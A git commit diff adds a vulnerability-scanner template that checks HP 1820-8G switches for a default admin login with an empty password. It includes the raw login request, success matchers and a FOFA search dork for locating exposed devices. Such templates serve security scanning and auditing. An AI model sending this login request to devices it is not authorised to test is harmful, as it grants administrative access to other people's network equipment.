Add files via upload
parent
1e088e2c8c
commit
30c447d42b
|
@ -0,0 +1,30 @@
|
|||
id: hp-1820-8G-switch-default-dredential
|
||||
info:
|
||||
name: HP 1820-8G Switch J9979A Default Credential
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
|
||||
metadata:
|
||||
fofa-dork: 'HP 1820-8G Switch J9979A'
|
||||
tags: default, hp
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /htdocs/login/login.lua HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
username=admin&password=
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"redirect": "/htdocs/pages/main/main.lsp"'
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue